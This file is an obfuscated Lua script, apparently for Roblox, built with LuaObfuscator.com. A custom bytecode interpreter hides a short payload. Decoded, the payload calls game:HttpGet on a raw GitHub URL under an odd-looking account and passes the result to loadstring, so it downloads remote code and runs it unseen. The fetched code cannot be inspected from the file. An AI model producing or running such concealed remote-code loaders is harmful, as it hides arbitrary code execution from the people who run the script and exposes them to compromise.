--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=v2(v0(v30,16));if v19 then local v91=v5(v84,v19);v19=nil;return v91;else return v84;end end end);local function v20(v31,v32,v33) if v33 then local v85=0 + (0 -0) ;local v86;while true do if (v85==(0 -(0 -0))) then v86=(v31/((879 -(282 + 595))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -(1 + 0))) -(v32-(620 -((1018 -463) + 64)))) + (1066 -(68 + 997)))) ;return v86-(v86%(1271 -((576 -(87 + 263)) + (1224 -(67 + 113))))) ;end end else local v87=(933 -((1814 -(892 + 65)) + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v87 + v87))>=v87) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=952 -(802 + 150) ;local v35;while true do if (v34==(1 + (0 -0))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=3 -2 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + 2 + 0 ;return (v37 * (1253 -(915 + 82))) + v36 ;end local function v23() local v38=0 -(0 -0) ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * (9773502 + 7003714)) + (v41 * (86188 -20652)) + (v40 * (1443 -(1069 + 118))) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (8 -4) ;v38=1 + 0 ;end end end local function v24() local v43=0 + 0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(886 -(261 + 624))) then v46=1;v47=(v20(v45,(1407 -615) -(368 + 423) ,62 -42 ) * (2^32)) + v44 ;v43=20 -((1090 -(1020 + 60)) + 8) ;end if (v43==((1430 -(630 + 793)) -5)) then v48=v20(v45,21,(1602 -1129) -((1969 -1553) + 26) );v49=((v20(v45,102 -70 )==(1 + 0)) and  -(1 -0)) or (439 -(145 + 293)) ;v43=3;end if (v43==(430 -(44 + 386))) then v44=v23();v45=v23();v43=1487 -(998 + 488) ;end if (v43==(1 + 2)) then if (v48==(0 + 0)) then if (v47==(772 -(201 + 571))) then return v49 * (1138 -(116 + 1022)) ;else v48=4 -3 ;v46=0 + 0 ;end elseif (v48==((2943 + 4529) -5425)) then return ((v47==(0 -(0 -0))) and (v49 * ((860 -(814 + 45))/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-1023 ) * (v46 + (v47/((1 + (1748 -(760 + 987)))^52))) ;end end end local function v25(v50) local v51=1913 -(1624 + 165 + 124) ;local v52;local v53;while true do if (v51==(768 -(745 + 21))) then v53={};for v92=1 + (0 -0) , #v52 do v53[v92]=v2(v1(v3(v52,v92,v92)));end v51=3;end if ((7 -4)==v51) then return v6(v53);end if (v51==(3 -2)) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=1 + 1 ;end if (v51==(0 + 0)) then v52=nil;if  not v50 then v50=v23();if (v50==((2468 -(447 + 966)) -(87 + 968))) then return "";end end v51=(10 -6) -3 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 0;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();while true do local v68=(function() return 1749 -(1013 + 736) ;end)();while true do if (v68~=(0 + 0)) then else if (v54~=(0 -0)) then else v55=(function() return function(v103,v104,v105) local v106=(function() return 0;end)();local v107=(function() return;end)();while true do if (v106==0) then v107=(function() return 0;end)();while true do if (v107==0) then local v162=(function() return 0 -0 ;end)();while true do if (v162==0) then v103[v104-#"/" ]=(function() return v105();end)();return v103,v104,v105;end end end end break;end end end;end)();v56=(function() return {};end)();v57=(function() return {};end)();v58=(function() return {};end)();v54=(function() return 1;end)();end if (v54~=1) then else local v98=(function() return 867 -(550 + 317) ;end)();while true do if ((0 -0)~=v98) then else v59=(function() return {v56,v57,nil,v58};end)();v60=(function() return v23();end)();v98=(function() return 1;end)();end if (v98~=1) then else v61=(function() return {};end)();for v112= #" ",v60 do local v113=(function() return 0 -0 ;end)();local v114=(function() return;end)();local v115=(function() return;end)();while true do if (1==v113) then if (v114== #">") then v115=(function() return v21()~=0 ;end)();elseif (v114==(5 -3)) then v115=(function() return v24();end)();elseif (v114~= #"91(") then else v115=(function() return v25();end)();end v61[v112]=(function() return v115;end)();break;end if (v113==(285 -(134 + 151))) then local v157=(function() return 0;end)();local v158=(function() return;end)();while true do if (v157==0) then v158=(function() return 0;end)();while true do if (v158==1) then v113=(function() return 1;end)();break;end if (v158==0) then v114=(function() return v21();end)();v115=(function() return nil;end)();v158=(function() return 1;end)();end end break;end end end end end v98=(function() return 1667 -(970 + 695) ;end)();end if (v98~=(3 -1)) then else v54=(function() return 2;end)();break;end end end v68=(function() return 1991 -(582 + 1408) ;end)();end if (v68==(3 -2)) then if ((2 -0)==v54) then v59[ #"91("]=(function() return v21();end)();for v100= #"{",v23() do local v101=(function() return v21();end)();if (v20(v101, #"/", #"}")~=(0 -0)) then else local v108=(function() return 0;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if ((1826 -(1195 + 629))==v108) then if (v20(v110, #".", #"!")== #"/") then v111[2 -0 ]=(function() return v61[v111[243 -(187 + 54) ]];end)();end if (v20(v110,2,2)== #"\\") then v111[ #"gha"]=(function() return v61[v111[ #"91("]];end)();end v108=(function() return 783 -(162 + 618) ;end)();end if (v108==(1 + 0)) then local v152=(function() return 0;end)();while true do if (v152~=1) then else v108=(function() return 2;end)();break;end if (v152~=(0 + 0)) then else v111=(function() return {v22(),v22(),nil,nil};end)();if (v109==0) then local v169=(function() return 0;end)();local v170=(function() return;end)();while true do if (v169==(0 -0)) then v170=(function() return 0;end)();while true do if ((0 + 0)~=v170) then else v111[ #"-19"]=(function() return v22();end)();v111[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v109== #",") then v111[ #"xnx"]=(function() return v23();end)();elseif (v109==(1638 -(1373 + 263))) then v111[ #"gha"]=(function() return v23() -(2^(1016 -(451 + 549))) ;end)();elseif (v109~= #"nil") then else local v177=(function() return 0;end)();local v178=(function() return;end)();while true do if (v177~=0) then else v178=(function() return 0;end)();while true do if (v178==0) then v111[ #"xnx"]=(function() return v23() -(2^(6 + 10)) ;end)();v111[ #"http"]=(function() return v22();end)();break;end end break;end end end v152=(function() return 1 -0 ;end)();end end end if (v108==(4 -1)) then if (v20(v110, #"-19", #"gha")== #"[") then v111[ #"xnxx"]=(function() return v61[v111[ #".com"]];end)();end v56[v100]=(function() return v111;end)();break;end if (v108==(1384 -(746 + 638))) then local v154=(function() return 0;end)();local v155=(function() return;end)();while true do if (v154~=(0 + 0)) then else v155=(function() return 0 -0 ;end)();while true do if (v155==(341 -(218 + 123))) then v109=(function() return v20(v101,1583 -(1535 + 46) , #"xnx");end)();v110=(function() return v20(v101, #"asd1",6);end)();v155=(function() return 1 + 0 ;end)();end if (v155==(1 + 0)) then v108=(function() return 1;end)();break;end end break;end end end end end end for v102= #".",v23() do v57,v102,v28=(function() return v55(v57,v102,v28);end)();end return v59;end break;end end end end local function v29(v62,v63,v64) local v65=v62[561 -((1563 -(1043 + 214)) + 254) ];local v66=v62[(3 -2) + 1 ];local v67=v62[5 -2 ];return function(...) local v69=v65;local v70=v66;local v71=v67;local v72=v27;local v73=1468 -(899 + (1780 -(323 + 889))) ;local v74= -((2 -1) + 0);local v75={};local v76={...};local v77=v12("#",...) -(604 -(268 + 335)) ;local v78={};local v79={};for v88=0,v77 do if ((v88>=v71) or (1804>=3275)) then v75[v88-v71 ]=v76[v88 + (291 -(60 + 230)) ];else v79[v88]=v76[v88 + (573 -(426 + 146)) ];end end local v80=(v77-v71) + 1 + 0 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1457 -(282 + 1174) ];if (v82<=(818 -(569 + 242))) then if (v82<=(8 -5)) then if ((v82<=((581 -(361 + 219)) + 0)) or (1417>3629)) then if (v82>((1344 -(53 + 267)) -(706 + 318))) then do return;end else v79[v81[1253 -(721 + 530) ]]=v64[v81[3]];end elseif ((4795>402) and (v82==2)) then v79[v81[1273 -(945 + 326) ]]={};else v79[v81[4 -2 ]]();end elseif (v82<=(2 + 3 + 0)) then if ((4813>3565) and (v82>(704 -(271 + 429)))) then local v119=v81[2 + 0 ];local v120=v79[v81[1503 -(1408 + 92) ]];v79[v119 + ((1500 -(15 + 398)) -(461 + 625)) ]=v120;v79[v119]=v120[v81[4]];else local v124=0;local v125;local v126;local v127;local v128;while true do if ((3912==3912) and (v124==1)) then v74=(v127 + v125) -1 ;v128=1288 -(993 + 295) ;v124=2;end if (v124==(0 + 0)) then v125=v81[2];v126,v127=v72(v79[v125](v13(v79,v125 + ((2154 -(18 + 964)) -(418 + 753)) ,v81[2 + 1 ])));v124=3 -2 ;end if (v124==(1 + 1)) then for v166=v125,v74 do local v167=0 + 0 ;while true do if (v167==(0 + 0 + 0)) then v128=v128 + 1 ;v79[v166]=v126[v128];break;end end end break;end end end elseif (v82>(535 -(256 + 150 + 123))) then v79[v81[1771 -((2599 -(20 + 830)) + 20) ]]();else local v129=v81[1 + 1 ];local v130=v79[v81[1325 -(1249 + 73) ]];v79[v129 + 1 + 0 ]=v130;v79[v129]=v130[v81[1149 -(466 + 679) ]];end elseif ((2821<=4824) and (v82<=11)) then if (v82<=(21 -12)) then if (v82==(22 -14)) then v79[v81[1902 -(106 + 1794) ]]={};else local v135=v81[2];local v136,v137=v72(v79[v135](v13(v79,v135 + 1 + 0 + 0 ,v81[1 + 2 ])));v74=(v137 + v135) -(2 -1) ;local v138=0 -(126 -(116 + 10)) ;for v149=v135,v74 do v138=v138 + 1 ;v79[v149]=v136[v138];end end elseif (v82==(124 -(4 + 110))) then local v139=v81[586 -(57 + 527) ];v79[v139]=v79[v139](v13(v79,v139 + 1 ,v74));else v79[v81[(106 + 1323) -(41 + 1386) ]]=v64[v81[106 -(17 + 86) ]];end elseif (v82<=(9 + (742 -(542 + 196)))) then if (v82==(26 -14)) then v79[v81[(10 -5) -3 ]]=v81[3];else local v145=166 -(122 + 44) ;local v146;while true do if (v145==(0 -0)) then v146=v81[6 -4 ];v79[v146]=v79[v146](v13(v79,v146 + 1 + 0 + 0 ,v74));break;end end end elseif (v82==(3 + 6 + 5)) then v79[v81[3 -1 ]]=v81[68 -(30 + 35) ];else do return;end end v73=v73 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403483Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F456A646B666A33386675662F4F572D2F726566732F68656164732F6D61696E2F34383338333800094Q00087Q00120B000100013Q00120B000200023Q00200600020002000300120E000400044Q0009000200044Q000A00013Q00022Q00070001000100012Q00013Q00017Q00",v9(),...);